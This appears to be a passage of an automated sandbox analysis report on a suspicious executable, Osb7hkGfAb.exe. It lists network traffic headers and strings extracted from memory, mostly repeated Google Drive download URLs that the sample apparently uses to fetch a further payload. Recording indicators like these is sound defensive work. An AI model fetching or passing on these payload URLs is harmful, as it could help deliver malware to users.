UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTYip5M0JUxyx7NsM8LZNljfWbw4L8XjNPfjc2qzBHCBnzOX8uQWcS_ZnEfVM4aPaZCF1D8mU8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:53 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-8roJ9Na603LJq4vYRZHJfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: Osb7hkGfAb.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: Osb7hkGfAb.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.00000000005F2000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.00000000005F2000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=d
      Source: Osb7hkGfAb.exe, 00000008.00000003.2614036788.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2454894175.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/C1A
      Source: Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
      Source: Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640163854.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2514090415.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2614036788.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadN
      Source: Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640163854.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2514090415.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2614036788.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadR
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640163854.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2614036788.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadider
      Source: Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadt
      Source: Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2514090415.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2327402583.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398929460.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2454894175.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadt6
      Source: Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2454894175.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K1I
      Source: Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/c1a
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2316016374.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2327402583.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398929460.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/lK1I
      Source: Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: Osb7hkGfAb.exe, 00000008.00000003.2398929460.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2454894175.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=do
      Source: Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ube.
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640604898.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4
      Source: Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398929460.0000000002E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4A
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4E
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2130363069.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2116570093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2316016374.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2327402583.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398929460.0000000002E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4KL?
      Source: Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2130363069.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2116570093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4M
      Source: Osb7hkGfAb.exe, 00000008.00000002.2640016739.0000000002DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4M:
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2514090415.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4Microso
      Source: Osb7hkGfAb.exe, 00000008.00000002.2640016739.0000000002DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4U:
      Source: Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4X
      Source: Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2514090415.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4gCL3LQ3cnIDyIL4A
